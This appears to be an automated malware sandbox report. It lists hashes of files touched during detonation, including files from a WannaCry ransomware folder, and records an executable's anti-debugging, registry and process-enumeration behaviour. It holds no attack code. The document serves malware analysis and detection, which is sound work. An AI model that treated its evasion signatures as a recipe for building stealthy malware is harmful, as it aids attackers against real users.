C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\AlternateServices.bin
| MD5 | 21ac5ffd863356295ebb8591bf2d558a |
| SHA1 | 6753fff299b9d668a066dee3519e3b2c3df02d8f |
| SHA256 | 0c9adad24f6e8c3364734f02777f7458f42c6ee5115a1e18c7600251d8f43925 |
| SHA512 | e77cfdff21b2eecf1e84e43c5dd07f5a6ae2ef21485b6ebc815608aa445a6136520d16c64e1a732174e09229f5d074f2194f60924069bb7f78c45f028419e320 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 4383532b000060637cebf21b34ec579c |
| SHA1 | 6807da31c89110eea4a875e78bb54e86b2db224d |
| SHA256 | 15ae592fdcc35fc36d050c2657e1cabf34ed3d9d9b3d2ad7e96711893051dff7 |
| SHA512 | 1786940fe13d9a4f5b49448bf459680faf94241e85296c839d1aec721d463c17961285def12ab17d87616bb254203cdd9088fd5de10c55c6c7b6f7ae64042269 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\prefs-1.js
| MD5 | ca5eb7c5b048949937c56f990c48bc49 |
| SHA1 | 966cab5f0176fff7c9a50854e75f032149c4b856 |
| SHA256 | 03798b5439b7f32f23bbae9d3a554ba6115ab1d9a8194b905ca5ef9596f87f76 |
| SHA512 | cf0bd3ff730280a5b30164b1383d6096d60acea985e9fa6c2adffb8512a95686fdf19cbcf2f558a03e1eb71eef716aec3ef16258d0ad5813aa4cb69a1b43bc88 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\cache2\entries\53E2264D03946D0F71472AED48B98967D82607D5
| MD5 | 3dd7e8f6a07a9b4d51d4c7fcf703573e |
| SHA1 | 8f53c85e659575b8b2e7fe6667ac5aaaf52d18c5 |
| SHA256 | ed15f37d46b9d4ba27a9e8af375e126dfcc9c3dc42528385b4fa87b50a25210f |
| SHA512 | f85a549ec1171a5fb53f0371853399bdddfbfc5f73d1e679e5effa03d77db7764c3a43f981f466beb979e52a018f65aac04e7a72c54a4e3c9dd5ea3ac7a0dc86 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\cache2\entries\CAD49892E5AB10B39B24859F853F0527D4EDC8F3
| MD5 | 411d965c2e790cf7f3f639d07128a468 |
| SHA1 | ed50f7cff76161752e7571756cd5a737ade8d126 |
| SHA256 | 0bc1fe1fea409edc369dbb8de9e48b42010b8e41a60e18145db71a89ee486ab5 |
| SHA512 | fed3feeba963e973a4cc216fe68c86e7ea50a4cc8d7e8fccec73afbeb93b8aaeda816708eb77ddf21d230dbbde25d8a54970a2765926f460bd4537be7497849d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\cache2\entries\2492994A253B970917AF5CDF605580B1C2DC16A0
| MD5 | e3dae46b6cfe81c15f64500539217479 |
| SHA1 | c2c44fcf75d2b942e42ff9f8a4a40aa6344f5f0b |
| SHA256 | 195a09f7ffd5f327628fafcf255efc263aaf0eb2b79f71b1b7e7b3f07606d205 |
| SHA512 | 914899ce200a67a38bc10b337237172776ed772b7a8022cb9dfe6d014b7d00f50eab335783dab1db4bc3ad453cff21f3078555c0be064f299bb4aaadf7268de2 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\cache2\entries\3ED7BDB8AF45BEE9CC5969FBAA43A9E0BF86A632
| MD5 | 029c3cb771bdf77c050a2943aaff0704 |
| SHA1 | a799de5463a295e87abcd79ac6d43930b91e14d2 |
| SHA256 | 9c8903e02924e92adb304df29e0efc6a786f2ed40662a4ca36ca9c43a18cf332 |
| SHA512 | d4903d3253b75c086f804b5f671b55b688c3701e02327b48172f0c136240b0c6611163c409a4283f4e2b1417f905fdae163158acc38f694695afd45d76d2447e |
C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41
| MD5 | efe76bf09daba2c594d2bc173d9b5cf0 |
| SHA1 | ba5de52939cb809eae10fdbb7fac47095a9599a7 |
| SHA256 | 707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a |
| SHA512 | 4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 76a5a658c37ab2efb12d6b43772e724c |
| SHA1 | 402aa2f41e6b5a2a461ac1e31797b6d6281f867a |
| SHA256 | 816abb9703885013376791444ab56a2d248f475df31491daddf790c4f379c33f |
| SHA512 | 7bbe77da0b1a557775aaefeb770b96e5cf1170f0d2d798fcd08eddf7a2a5f9aed6bf9c2e58e021c93c988b90bfd277d40f7e0a6d77eef836d5184df201fa75e3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 7e180df0fcb97e3561ca09a460dc2367 |
| SHA1 | 203f447f256cfe1f73e8d7e35830a8d0fa0c0086 |
| SHA256 | ea6bdcf381dd811b42979b58427c1fa21b7eb56fbec3d92e44307e8ec7d134d8 |
| SHA512 | 7b416c206ac60d60c7f780ec9bfc2e69e11b72fc607f8c285d773858392876a72f4dcfa78bf5cd39ca0cb2fbc60a7cefe227bb3b36e706ab8a463ddf53a795d1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 333dc2595f57303301e2784fa290f80b |
| SHA1 | f0b5b1c518e92944a5659378cddbc513feb32d4a |
| SHA256 | d57a54013e2d636fc50c26b2a46d2586eb92473420d4dc182139cea5a2010fe1 |
| SHA512 | b0fe84b504dadc4c308e54f798a7cf0db35830c5e505c8cbca9d2e21265c6ad19fd876ff7825772fac12c4517694d51121ca586915a824bd385d230cbc3d641e |
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_finnish.wnry
| MD5 | 35c2f97eea8819b1caebd23fee732d8f |
| SHA1 | e354d1cc43d6a39d9732adea5d3b0f57284255d2 |
| SHA256 | 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e |
| SHA512 | 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf |
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
| MD5 | 7a2726bb6e6a79fb1d092b7f2b688af0 |
| SHA1 | b3effadce8b76aee8cd6ce2eccbb8701797468a2 |
| SHA256 | 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5 |
| SHA512 | 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54 |
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
| MD5 | 7e427b959f239f99dadd465880a82503 |
| SHA1 | ff7588d1828cbbb4f5e681012cac5f23159e787f |
| SHA256 | 5cf65c19ca523d2d718c93b87397c995e35fcdd252c52af752b5841819368ffa |
| SHA512 | 3536d38f74a44a5fef55f34cfad0da529f0f59b4d0bd214284806d35e62f4363515b86ffe06eb5aeb7592f1f732a6d5e4ac3cba05cf13d49a9e1f0dde368a1d5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 375588f2120c8af6945db2a1bdc13692 |
| SHA1 | b0004b10f37a1ae1ef5d8ea25b92aaccb15cd803 |
| SHA256 | 15db3b16d3a57ae6ddc4bef67ef772537d4fd80062d313057b5845cb3121bce5 |
| SHA512 | 37ea8a63c4093e7e912c544093629b857c42130d10e6d5a4c2c33ef7e55624ab90f3f357378ee0d8c804d62eff27e16e462c74ba85294a0d6ff0b391a43eef86 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionstore-backups\recovery.baklz4
| MD5 | dddcbe5a267c5d22b59d1ec1b14613b3 |
| SHA1 | cba74b2229312419bf0121fdd9092ff481d97bc1 |
| SHA256 | 1bd35f3658e6f41fa07684b870f43392ef0a41eccda95e5a7451e8843c6d0c2c |
| SHA512 | 8d0fe316cad051723c4e506bf9e1f4af250828a4c3ff4449cff99fb33a9a20441c111d98532707033e32948e3f683793379794039495b1b005c24a8e28f5328b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 1b4eb5f3f902b524259cb63a0e3bfaaa |
| SHA1 | cf78b6513a301a874d623dcf5261687415f53e8c |
| SHA256 | d9be7a01a04ed580d2d4480d8f3e3a7c0167d76962241b3a3043e3861f421f61 |
| SHA512 | de89a7b8641b6c5733e101e24337774c47e8fb61913a8891bcc7c11878f7bb5b34b1a07da9c682f801d508430194f2f78ed17a07df219d99753dc794f2afedba |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 1fb332da12cfa12197887b295868b396 |
| SHA1 | c3d00ddd142ab9c72903eda14dec771222a88b90 |
| SHA256 | 54be54883506761444fae3af6964f36a17a83a1bf56c93d38c7c75458c454959 |
| SHA512 | b66204e02457acd0f8e308790d0bca2382da2420c4d8bf220457b89854a99c8cce80c00e81b063e6b19141d3bc80dc2c80ae62be7dc277c7abb727d98526e059 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\cache2\entries\A57A2523001CFC65DC31F8400E477A34579FA293
| MD5 | 7dc91a95d7a7a773598959c50eaedd8d |
| SHA1 | 3ae2e3e9211114901fb9d051470fbe9836df5bf6 |
| SHA256 | 3b05747b7e10eba93b5f4432a90f5aba9f8ac8048cf5c6a58ebfbf46eb16ac44 |
| SHA512 | 935b159e1345a501ab768ffb3d195fc52efe11ecbd35b0a02335a7d7aee19f22e219491e0a627e24db8fbdc46ef756583ea2edcc0c8e3eb1198d1b704a267705 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\cache2\entries\E8B6B128BE40E5885AB86E84B21EBB9A7319AD2B
| MD5 | d2a5b19d1cda0d03989456d7e988369c |
| SHA1 | 8b33c80f327649b9a0222f96274a73333f79c4ce |
| SHA256 | 3229439f613c3f01ae0d4a78dbed7cf9fff94d1f8e50eb7c3c3fc59163311638 |
| SHA512 | 97407c620e913be1ab470bbe2401450f093b304f521eeb872c1c0c65cf02679fe39b686fcf692efa4ad1ff67ae868d350b9c7411f30723ea3129175cc5aa2d2f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | ed5eee1027655941ba77abdef16f0d55 |
| SHA1 | 05b4a5319ca5091656e9f23a072d4d483f20942b |
| SHA256 | eb895657c42a856f3a2d9d19fa5530ccdfd9993f4fa0f0dfbe9107caf3f8970b |
| SHA512 | 8a019dc4d9f70066d04611e0d092ae53d1b1fed10d9164bb598380383bcb08fbcd3e8260ba1840ad15de269bc5ff4171cc8232d67e579d97367cd04a0a92eb97 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 258b3e010e85a69ea03d05a0a9beabb2 |
| SHA1 | 279b3d2efeb050d128d9213f8b269fe4ff16a3b2 |
| SHA256 | baf61fce251aca8cf38d62c3afd3053357cb982a24e60105caf7ad887c45d9c7 |
| SHA512 | 9bf9b4be6e4d2cdc1fd751f01299c09542d0dfa58a66e4a67491a65c3ededb8e2e85762b91af2271c9f96a6127135dd82732d8b85ce5862f9d6768d64c1be918 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\jumpListCache\IryYYrY3sH1sEmY5iLdm78UraepYQe+yNoKmi19XWoY=.ico
| MD5 | 8e2c37264c426be2221faeda4f074500 |
| SHA1 | f5ceb16f7095cca2063ec9da043ebb0338fe93a8 |
| SHA256 | 098e48ce42ac840d67fc1b20be2c8a3562fa6d24b94707cba9f94ca96ce1671d |
| SHA512 | 0fc0c582033882dd94326558f08c72767b53c9b09a1ca8c75299952ff1dfbdbf475208e0fb97ea83d2a73eeddb3865e0cf6ef5c0d4d7459df35761245cdcad25 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 3ed86ac44562d8fa67b7e422108df928 |
| SHA1 | 5bdb8d5e3e283757749bc39e9421cca109619dbb |
| SHA256 | e7d8360fa82d408c670a84c74938232b717b0d868c9e6e1d58f399794d7fc8fb |
| SHA512 | e06834b4db87de92607a92d005204b25a1b9e681b7bcf2a0a52f396fa3bc987e6dd21cb401cb3fc032e134edd7c439ce19fb67904ac6477a64930f119d30746e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionCheckpoints.json
| MD5 | 99601438ae1349b653fcd00278943f90 |
| SHA1 | 8958d05e9362f6f0f3b616f7bfd0aeb5d37967c9 |
| SHA256 | 72d74b596f7fc079d15431b51ce565a6465a40f5897682a94a3f1dd19b07959a |
| SHA512 | ffa863d5d6af4a48aadc5c92df4781d3aacbf5d91b43b5e68569952ffec513ff95655b3e54c2161fe27d2274dd4778bad517c7a3972f206381ef292808628c55 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionCheckpoints.json
| MD5 | 65690c43c42921410ec8043e34f09079 |
| SHA1 | 362add4dbd0c978ae222a354a4e8d35563da14b4 |
| SHA256 | 7343d5a46e2fca762305a4f85c45484a49c1607ede8e8c4bd12bedd2327edb8d |
| SHA512 | c0208d51cf1586e75f22764b82c48ecbb42c1ff54aa412a85af13d686e0119b4e49e98450d25c70e3792d3b9c2cda0c5ab0c6931ebaf548693bb970a35ae62b9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\pending_pings\ab7b578f-ae78-4afe-83be-320076655d35
| MD5 | b521a57134b991d921cc8e139f851529 |
| SHA1 | 4debdf6ac8f11d5a3b971c15c0952a5604d756ff |
| SHA256 | 98575714cfd174d8468d161d9bc53b3ebdbadc66d8d462d402315345d23088d6 |
| SHA512 | a58ce481e57086e7a2d28c44f03ec3693ee8a6594c4cf732b945f9007ee07e9e819158ddafc0c571746b90aeb3c28b45ae9667d4faf30e67665d79ecae8e9cb8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 581ada62e9665abf28e0f96fc62aebdd |
| SHA1 | 1a4bb0a96daa22c964115a40dd2b8689b85a6acf |
| SHA256 | f78e15fc0aabafc88f1fcfcfe0dde7eef568ef4789a2206a9217e335b2ebd122 |
| SHA512 | c6b65378789c87f688ba3ce922e62203a0bc2bb2b2c27bac7659aaf4669aecdb2ac386b4795d2e9fecab9e2d943a50f80b8098a25e880e248af8e728e3f6c63a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionCheckpoints.json
| MD5 | 2ad4fe43dc84c6adbdfd90aaba12703f |
| SHA1 | 28a6c7eff625a2da72b932aa00a63c31234f0e7f |
| SHA256 | ecb4133a183cb6c533a1c4ded26b663e2232af77db1a379f9bd68840127c7933 |
| SHA512 | 2ee947dcf3eb05258c7a8c45cb60082a697dbe6d683152fe7117d20f7d3eb2beaaf5656154b379193cdc763d7f2f3b114cf61b4dd0f8a65326e662165ccf89cc |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionCheckpoints.json.tmp
| MD5 | e6c20f53d6714067f2b49d0e9ba8030e |
| SHA1 | f516dc1084cdd8302b3e7f7167b905e603b6f04f |
| SHA256 | 50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092 |
| SHA512 | 462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionCheckpoints.json
| MD5 | 948a7403e323297c6bb8a5c791b42866 |
| SHA1 | 88a555717e8a4a33eccfb7d47a2a4aa31038f9c0 |
| SHA256 | 2fca1f29b73dd5b4159fa1eb16e69276482f5224ba7d2219a547039129a51f0e |
| SHA512 | 17e2f65c33f47c8bb4beca31db2aff3d4bbb6c2d36924057f9f847e207bdcb85ffcbb32c80dd06862ffc9b7f0bd3f5e2e65b48bb1bc3363732751101d5596b1a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\places.sqlite
| MD5 | 52a79dd5dce60b3dad2e822680dd5bbd |
| SHA1 | b88ffe083aa50d5db19ef1c601361a92d6fdba18 |
| SHA256 | 7cd31015a331de1e4f5058fd56ab13afddb66f856bb22f23b5070f1b8ee6aab7 |
| SHA512 | 2307dee7a136c7d71fbeb455900c89de4fa3a413e1187d49b96e6e5dc4c72ad37fe5116783f3414c1dee68eed8acfce2eefdcc103b9d5889ff9d2e833e732e4d |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 23:13
Reported
2024-11-10 23:16
Platform
win11-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \Registry\User\.DEFAULT\Software\MemeSense | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe
"C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe"
Network
Files
memory/3996-0-0x00000001401A1000-0x000000014068C000-memory.dmp
memory/3996-1-0x00007FFEAFBF0000-0x00007FFEAFBF2000-memory.dmp
memory/3996-3-0x0000000140000000-0x0000000140EBF000-memory.dmp
memory/3996-7-0x0000000140000000-0x0000000140EBF000-memory.dmp
memory/3996-2-0x00007FFEAFC00000-0x00007FFEAFC02000-memory.dmp
memory/3996-8-0x0000000140000000-0x0000000140EBF000-memory.dmp
memory/3996-9-0x00000001401A1000-0x000000014068C000-memory.dmp
memory/3996-10-0x0000000140000000-0x0000000140EBF000-memory.dmp
memory/3996-11-0x0000000140000000-0x0000000140EBF000-memory.dmp